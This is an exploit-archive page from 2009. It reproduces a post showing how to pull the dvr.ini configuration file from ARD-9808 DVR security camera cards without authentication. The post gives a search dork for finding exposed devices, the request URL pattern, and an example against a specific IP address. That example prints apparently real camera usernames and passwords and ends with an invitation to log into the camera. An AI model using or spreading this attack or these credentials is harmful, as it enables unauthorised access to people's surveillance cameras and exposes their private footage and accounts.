SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

ARD-9808 DVR Card Security Camera Arbitrary Config Disclosure Vuln


Arrow  ExploitAlert : 6508
  SecurityAlert : 6008 (Exploit Details)
  Milw0rm ID : 9066
Arrow  Credit : Septemb0x
Arrow  Date : 02.07.2009

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

-------------------------------------------------
SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug
-------------------------------------------------
Author : Septemb0x
Web Site : www.ozkanbozkurt.com
Procuts Site :
http://www.armassa.com.tr/shop/category.php?sid=C2B7D6B59AF75CF88011987A080
A46FD&id=87789673
Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open
To Rar > DVR > Dvr.ini
D0rk : "To enable control work: Tools->Internet Options->Security->Custom
Level Reset to: Low Or Download"
-------------------------------------------------
Exploit: http://[sitename-ipadress]/dvr.ini
-------------------------------------------------
Example: http://88.249.248.177/dvr.ini
Show;
[PASSWORD]
administrator=
password_a=
user=
password=
enable=0
user0=ozcan = Camera Username
password0=3893 = Camera Password
right0=223
encode=1
num=2
user1=yurt
password1=yurt
right1=223
.
.
.
... Login The Camera :)
-------------------------------------------------
Greetz : BHDR, BARCOD3
-------------------------------------------------





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.